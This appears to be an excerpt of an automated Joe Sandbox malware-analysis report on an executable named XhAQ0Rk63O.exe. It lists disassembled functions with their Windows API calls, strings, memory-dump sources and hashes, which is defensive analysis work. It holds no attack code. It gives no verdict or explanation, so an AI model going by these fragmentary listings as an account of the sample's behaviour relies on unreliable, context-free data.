                                                                                          • Opcode ID: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                          • Instruction ID: 434b10a17d45167e777e8ea6e726dd6ee4e01267e4a119798c8aa60e835c5cdc
                                                                                          • Opcode Fuzzy Hash: 2e10f5a1695edfae3743bbe69767f09e04e95ab32c83142982b04f1cb5eb07ed
                                                                                          • Instruction Fuzzy Hash: CA21D7756002147BD600BB29CC45EBFB39CEB85314F04492FF984A7291EABCEC0A4779
                                                                                          Function 00448DAF Relevance: 15.2, APIs: 10, Instructions: 173windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 004419ED: DeleteObject.GDI32(?), ref: 00441A53
                                                                                          • SendMessageW.USER32(76C223D0,00001001,00000000,00000000), ref: 00448E73
                                                                                          • SendMessageW.USER32(76C223D0,00001026,00000000,00000000), ref: 00448E7E
                                                                                            • Part of subcall function 00441A7A: CreateSolidBrush.GDI32 ref: 00441ACB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$BrushCreateDeleteObjectSolid
                                                                                          • String ID:
                                                                                          • API String ID: 3771399671-0
                                                                                          • Opcode ID: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                          • Instruction ID: ebbecaf0548398ae771b9aa28ebf0b72f134f9ffbbfb28b2279bd799396bd9e3
                                                                                          • Opcode Fuzzy Hash: 51f09a1d655476e15b4ab454a85655f186203ac899921849c361721d54d31972
                                                                                          • Instruction Fuzzy Hash: F4510930208300AFE2209F25DD85F6F77EAEB85B14F14091EF994E72D0CBB9E9458769
                                                                                          Function 0046ECBF Relevance: 15.1, APIs: 10, Instructions: 101COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 3413494760-0
                                                                                          • Opcode ID: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                          • Instruction ID: 77b59fa0745152fd1b6386ccdd9ca850b9b7f4abb66e551d88b584249de3d357
                                                                                          • Opcode Fuzzy Hash: 482f3b1f0bd705d72ebf0bcdddfb27694f63f3fe8f528a3bcd533af3ba5d9e97
                                                                                          • Instruction Fuzzy Hash: F83150B2600746AFC714DF7AC880996FBA8FF88310B44892EE64983641D735F554CBA5
                                                                                          Function 004377B4 Relevance: 15.1, APIs: 10, Instructions: 97threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004377D7
                                                                                          • GetForegroundWindow.USER32(00000000,?,?,?,?,0045FDE0,?,?,00000001), ref: 004377EB
                                                                                          • GetWindowThreadProcessId.USER32(00000000), ref: 004377F8
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 00437809
                                                                                          • GetWindowThreadProcessId.USER32(?,00000001), ref: 00437819
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043782E
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,0045FDE0,?,?,00000001), ref: 0043783D
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 0043788D
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378A1
                                                                                          • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,0045FDE0,?,?,00000001), ref: 004378AC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                          • String ID:
                                                                                          • API String ID: 2156557900-0
                                                                                          • Opcode ID: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                          • Instruction ID: cf5237ead9178137421241ba4763476990ac919c12b5de4495d1c20f4e3090f4
                                                                                          • Opcode Fuzzy Hash: f5203a8e23f024bead7fa0256802a4b49a7a8dce25e7908e04b44143f6d1477f
                                                                                          • Instruction Fuzzy Hash: B0316FB1504341AFD768EF28DC88A7BB7A9EF9D310F14182EF44197250D7B89C44CB69
                                                                                          Function 0045F776 Relevance: 14.4, APIs: 5, Strings: 3, Instructions: 446COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: __wcsicoll
                                                                                          • String ID: 0%d$DOWN$OFF
                                                                                          • API String ID: 3832890014-468733193
                                                                                          • Opcode ID: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                          • Instruction ID: 3901981f80fa7430cd77b89167089bc3925961a07aad88d0cc2f25a35af8916b
                                                                                          • Opcode Fuzzy Hash: b886d43e96c57de01ffb669c6ba173cdd7012b944398daffbb17888043fd80c7
                                                                                          • Instruction Fuzzy Hash: B7F1D8614083856DEB21EB21C845BAF7BE85F95309F08092FF98212193D7BCD68DC76B
                                                                                          Function 0045E912 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 353timeCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045E959
                                                                                          • VariantCopy.OLEAUT32(00000000), ref: 0045E963
                                                                                          • VariantClear.OLEAUT32 ref: 0045E970
                                                                                          • VariantTimeToSystemTime.OLEAUT32 ref: 0045EAEB
                                                                                          • __swprintf.LIBCMT ref: 0045EB1F
                                                                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0045EB61
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0045EBE7
                                                                                          Strings
                                                                                          • %4d%02d%02d%02d%02d%02d, xrefs: 0045EB19
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$InitTime$ClearCopyFromSystem__swprintf
                                                                                          • String ID: %4d%02d%02d%02d%02d%02d
                                                                                          • API String ID: 43541914-1568723262
                                                                                          • Opcode ID: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
                                                                                          • Instruction ID: db8708ae94f177a13b26e6bf0e0b18ed2eb17208bc27bd00c320e315e6f9d40a
                                                                                          • Opcode Fuzzy Hash: 14db4cabc5e1b0f67770c810f21e70b33e6c91423244c68acaef5aa9588cc2da
                                                                                          • Instruction Fuzzy Hash: ABC1F4BB1006019BC704AF06D480666F7A1FFD4322F14896FED984B341DB3AE95ED7A6
                                                                                          Function 0042FE54 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 298sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FE66
                                                                                          • Sleep.KERNEL32(0000000A), ref: 0042FE6E
                                                                                          • InterlockedDecrement.KERNEL32(004A7CAC), ref: 0042FF5D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DecrementInterlocked$Sleep
                                                                                          • String ID: 0vH$0vH$4RH0vH$@COM_EVENTOBJ
                                                                                          • API String ID: 2250217261-3412429629
                                                                                          • Opcode ID: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                                                          • Instruction ID: 990b5f35a06538e4ae7b6c94f393f4a5fafaaf51bfa382c75dcb300f2d234fa3
                                                                                          • Opcode Fuzzy Hash: 259a8d3968bbabb0e43eb8f22aa2195a71f663abf8571a10d24c6569a0fcc496
                                                                                          • Instruction Fuzzy Hash: E0B1C0715083009FC714EF54C990A5FB3E4AF98304F508A2FF495972A2DB78ED4ACB9A
                                                                                          Function 004689FF Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 288COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                          • API String ID: 0-1603158881
                                                                                          • Opcode ID: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                          • Instruction ID: 1d39c91c6ba170ccd8bd44326015c92659356e06a413e753493f98454e3169a0
                                                                                          • Opcode Fuzzy Hash: b68d94a9d6a5d87f13f0fb5a725928f8f142c37ef967d8f11e3e615729381ce2
                                                                                          • Instruction Fuzzy Hash: 49A1D3B14043459BCB20EF50CC81BDE37A4AF94348F44891FF9896B182EF79A64DC76A
                                                                                          Function 00479C97 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 274COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 00479D1F
                                                                                          • VariantInit.OLEAUT32(?), ref: 00479F06
                                                                                          • VariantClear.OLEAUT32(?), ref: 00479F11
                                                                                          • VariantInit.OLEAUT32(?), ref: 00479DF7
                                                                                            • Part of subcall function 00467626: VariantInit.OLEAUT32(00000000), ref: 00467666
                                                                                            • Part of subcall function 00467626: VariantCopy.OLEAUT32(00000000,00479BD3), ref: 00467670
                                                                                            • Part of subcall function 00467626: VariantClear.OLEAUT32 ref: 0046767D
                                                                                          • VariantClear.OLEAUT32(?), ref: 00479F9C
                                                                                            • Part of subcall function 004781AE: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                            • Part of subcall function 004781AE: VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$Copy$ClearInit$ErrorLast_memset
                                                                                          • String ID: F$Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                          • API String ID: 665237470-60002521
                                                                                          • Opcode ID: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                          • Instruction ID: 799f1794578ead7d01377608c22e1fb401aa4fc5ffca8a64c02b8280356d09a3
                                                                                          • Opcode Fuzzy Hash: d48da594d57f6aadbcc7a695fec4cf75dc39f6aec1ddb07572db38b207896a5c
                                                                                          • Instruction Fuzzy Hash: 6091B272204341AFD720DF64D880EABB7E9EFC4314F50891EF28987291D7B9AD45C766
                                                                                          Function 00401D10 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 235COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00401D5A
                                                                                          • DestroyWindow.USER32(?), ref: 0042A751
                                                                                          • UnregisterHotKey.USER32(?), ref: 0042A778
                                                                                          • FreeLibrary.KERNEL32(?), ref: 0042A822
                                                                                          • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0042A854
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Free$DestroyLibrarySendStringUnregisterVirtualWindow
                                                                                          • String ID: close all$Wu
                                                                                          • API String ID: 4174999648-1790509019
                                                                                          • Opcode ID: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                          • Instruction ID: e23b5dd52123a376b0379481fe8be5d2f02d07e70979f80a1c72d587d5a24a2c
                                                                                          • Opcode Fuzzy Hash: ddf39f1eda455a1c63d5a7d3271f56cd3ed42d138f3b783cbb3ca1597947a384
                                                                                          • Instruction Fuzzy Hash: FFA17075A102248FCB20EF55CC85B9AB3B8BF44304F5044EEE90967291D779AE85CF9D
                                                                                          Function 0046A75F Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 179registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046A84D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ConnectRegistry_wcslen
                                                                                          • String ID: HH
                                                                                          • API String ID: 535477410-2761332787
                                                                                          • Opcode ID: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                          • Instruction ID: 68d8ff7817732ac0dd8275009c421e29eb5870de2046e22f9b94a35ba54c9d9f
                                                                                          • Opcode Fuzzy Hash: 95544a26956fe54eb2a8636236a3b10fc217bfdb2bff17811b2f45cb9df4731a
                                                                                          • Instruction Fuzzy Hash: FE617FB56083009FD304EF65C981F6BB7E4AF88704F14891EF681A7291D678ED09CB97
                                                                                          Function 0045F2C5 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 146windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _memset.LIBCMT ref: 0045F317
                                                                                          • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 0045F367
                                                                                          • IsMenu.USER32(?), ref: 0045F380
                                                                                          • CreatePopupMenu.USER32 ref: 0045F3C5
                                                                                          • GetMenuItemCount.USER32(?), ref: 0045F42F
                                                                                          • InsertMenuItemW.USER32(?,?,00000001,?), ref: 0045F45B
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                          • String ID: 0$2
                                                                                          • API String ID: 3311875123-3793063076
                                                                                          • Opcode ID: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                          • Instruction ID: 6c7ab59355789d00cbd42ef361c1bd9312a1bc9220e92816940967e3bd29aecc
                                                                                          • Opcode Fuzzy Hash: fbdd9a11e44187a4bf70f7de18f8631e861f84fad9f8f26dcc1fb12baf34abbc
                                                                                          • Instruction Fuzzy Hash: E451CF702043409FD710CF69D888B6BBBE4AFA5319F104A3EFD9586292D378994DCB67
                                                                                          Function 0043717F Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 46windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleHandleW.KERNEL32(00000000,004A8E80,00000100,00000100,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe), ref: 0043719E
                                                                                          • LoadStringW.USER32(00000000), ref: 004371A7
                                                                                          • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 004371BD
                                                                                          • LoadStringW.USER32(00000000), ref: 004371C0
                                                                                          • _printf.LIBCMT ref: 004371EC
                                                                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00437208
                                                                                          Strings
                                                                                          • %s (%d) : ==> %s: %s %s, xrefs: 004371E7
                                                                                          • C:\Users\user\Desktop\XhAQ0Rk63O.exe, xrefs: 00437189
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: HandleLoadModuleString$Message_printf
                                                                                          • String ID: %s (%d) : ==> %s: %s %s$C:\Users\user\Desktop\XhAQ0Rk63O.exe
                                                                                          • API String ID: 220974073-3236874046
                                                                                          • Opcode ID: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                          • Instruction ID: cc9e6972dbc5209964c20f0f7d1f7455a13934f6c555fd98bc0bf92a0502fb90
                                                                                          • Opcode Fuzzy Hash: 94d1ddb87e9fdddd1f0eb85761e890ae026325719f266e56d7856026e6b64315
                                                                                          • Instruction Fuzzy Hash: F7014FB2A543447AE620EB549D06FFB365CABC4B01F444C1EB794A60C0AAF865548BBA
                                                                                          Function 00456168 Relevance: 13.7, APIs: 9, Instructions: 181COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                          • Instruction ID: 20732dcab93056f759d0b04a6df1a57780e33876730225f1fefd21ccf2a16f59
                                                                                          • Opcode Fuzzy Hash: b00adbc1ea9d53563bb8a7982d93c3fa4b8356126e06b3aad1cc727703ca6f1a
                                                                                          • Instruction Fuzzy Hash: 36519070200301ABD320DF29CC85F5BB7E8EB48715F540A1EF995E7292D7B4E949CB29
                                                                                          Function 004534EB Relevance: 13.6, APIs: 9, Instructions: 150filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\XhAQ0Rk63O.exe,?,C:\Users\user\Desktop\XhAQ0Rk63O.exe,004A8E80,C:\Users\user\Desktop\XhAQ0Rk63O.exe,0040F3D2), ref: 0040FFCA
                                                                                            • Part of subcall function 00436AC4: GetFileAttributesW.KERNEL32(?,0044BD82,?,?,?), ref: 00436AC9
                                                                                          • lstrcmpiW.KERNEL32(?,?), ref: 0045355E
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0045358E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$AttributesFullMoveNamePathlstrcmpi
                                                                                          • String ID:
                                                                                          • API String ID: 978794511-0
                                                                                          • Opcode ID: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                          • Instruction ID: dcad70f49e32ae1adaf0c812d378eb0bba467e0a617048934f4a65f03e3a0b24
                                                                                          • Opcode Fuzzy Hash: 905b41a6b5f1f1e7811aa1c06e555ad1605d40905c9a381d53b63ac73f12040d
                                                                                          • Instruction Fuzzy Hash: 665162B25043406AC724EF61D885ADFB3E8AFC8305F44992EB94992151E73DD34DC767
                                                                                          Function 004417BC Relevance: 13.6, APIs: 9, Instructions: 142COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
